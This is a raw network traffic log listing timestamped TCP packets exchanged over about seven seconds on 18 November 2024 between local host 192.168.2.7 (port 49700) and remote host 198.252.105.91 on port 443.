                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:26.874799967 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:26.874821901 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.001168013 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.001199961 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.001266003 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.001286983 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.001311064 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.001326084 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.165335894 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.165364027 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.165416002 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.165430069 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.165477991 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.282541037 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.282577991 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.282824993 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.282845974 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.282890081 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.282911062 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.461086035 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.461122990 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.461174965 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.461194038 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.461225033 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.461251974 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.629158974 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.629194021 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.629290104 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.629323006 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.629378080 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.863209963 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.863228083 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.863274097 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.863383055 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.863404036 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.863442898 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:27.863467932 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.245745897 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.245762110 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.245799065 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.245855093 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.245882988 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.245898962 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.245995045 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.246283054 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.246300936 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.246404886 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.246414900 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.246500015 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.418776989 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.418807030 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.418926954 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.418943882 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.418993950 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.565778971 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.565809011 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.565957069 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.565988064 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.566039085 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.770382881 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.770418882 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.770529032 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.770544052 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.770627022 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.887197971 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.887228966 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.887377024 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.887398005 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.887449026 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.035414934 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.035448074 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.035589933 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.035608053 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.035655022 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.199254036 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.199278116 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.199374914 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.199408054 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.199455976 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.316304922 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.316333055 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.316425085 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.316437006 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.316483974 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.536156893 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.536192894 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.536365032 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.536398888 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.536451101 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.598076105 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.598141909 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.598227024 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.598254919 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.598274946 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.598311901 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.831285000 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.831325054 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.831384897 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.831407070 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.831423044 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.831449986 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.949517012 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.949544907 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.949737072 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.949770927 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.949829102 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.214931011 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.214947939 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.215039015 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.215111017 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.215126991 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.215220928 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.215220928 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.215387106 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.215409040 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.215487003 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.215493917 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.215504885 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.215533972 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.420378923 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.420473099 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.420552015 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.420588970 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.420605898 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.420641899 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.561410904 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.561475039 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.561556101 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.561573982 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.561615944 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.565313101 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.771740913 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.771759033 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.771780014 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.771883011 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.771907091 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.771951914 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:30.771970987 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.009350061 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.009362936 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.009413004 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.009459019 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.009480953 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.009540081 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.009560108 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.148082018 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.148117065 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.148164034 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.148175955 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.148215055 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.148236036 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.265963078 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.265988111 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.266103983 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.266134024 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.266202927 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.500094891 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.500111103 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.500128031 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.500322104 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.500355005 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.500464916 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.617130995 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.617156982 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.617388964 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.617405891 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.617654085 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.757498026 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.757524014 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.757692099 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.757725954 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.757869005 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.874784946 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.874811888 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.874964952 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.875003099 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.875055075 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.992094040 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.992121935 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.992289066 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.992309093 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.992382050 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.109520912 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.109554052 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.109669924 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.109669924 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.109693050 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.109745979 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.226463079 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.226490021 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.226584911 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.226618052 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.226748943 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.343569994 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.343597889 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.343769073 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.343811989 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.343858957 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.460864067 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.460932970 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.461040020 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.461076975 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.461097956 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.461131096 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.577969074 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.577996016 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.578126907 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.578160048 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.578207970 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.694854021 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.694927931 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.695101023 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.695122957 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.695192099 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.811990976 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.812057018 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.812189102 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.812222004 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.812247992 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.812268019 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.046520948 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.046541929 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.046588898 CET44349700198.252.105.91192.168.2.7
